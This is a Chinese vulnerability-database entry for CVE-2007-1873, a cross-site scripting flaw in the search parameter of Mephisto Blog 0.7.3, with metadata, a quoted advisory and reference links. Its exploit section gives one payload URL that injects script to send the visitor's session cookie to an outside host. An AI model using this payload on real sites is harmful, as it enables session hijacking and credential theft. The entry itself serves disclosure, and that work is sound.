mephisto 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112551 漏洞类型 跨站脚本
发布时间 2007-03-26 更新时间 2007-04-17
CVE编号 CVE-2007-1873 CNNVD-ID CNNVD-200704-253
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/29780
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-253
|漏洞详情
mephisto存在跨站脚本攻击漏洞。远程攻击者可以借助提交到搜索脚本的q参数,注入任意的web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/23141/info

Mephisto Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Mephisto Blog version 0.7.3 is vulnerable to this issue; other versions may also be affected.

http://www.example.com/search?q="/><script>window.location="http://www.example2.com/script.php?data="+document.cookie</script>
|参考资料

来源:BUGTRAQ
名称:20070412Re:Crosssitescriptinginmephisto0.7.3
链接:http://www.securityfocus.com/archive/1/archive/1/465548/100/0/threaded
来源:BUGTRAQ
名称:20070411Crosssitescriptinginmephisto0.7.3
链接:http://www.securityfocus.com/archive/1/archive/1/465484/100/0/threaded
来源:VUPEN
名称:ADV-2007-1373
链接:http://www.frsirt.com/english/advisories/2007/1373
来源:OSVDB
名称:34911
链接:http://osvdb.org/34911
来源:MISC
链接:http://int21.de/cve/CVE-2007-1873-mephisto.txt
来源:XF
名称:mephisto-search-xss(33620)
链接:http://xforce.iss.net/xforce/xfdb/33620
来源:BID
名称:23141
链接:http://www.securityfocus.com/bid/23141
来源:SECUNIA
名称:24870
链接:http://secunia.com/advisories/24870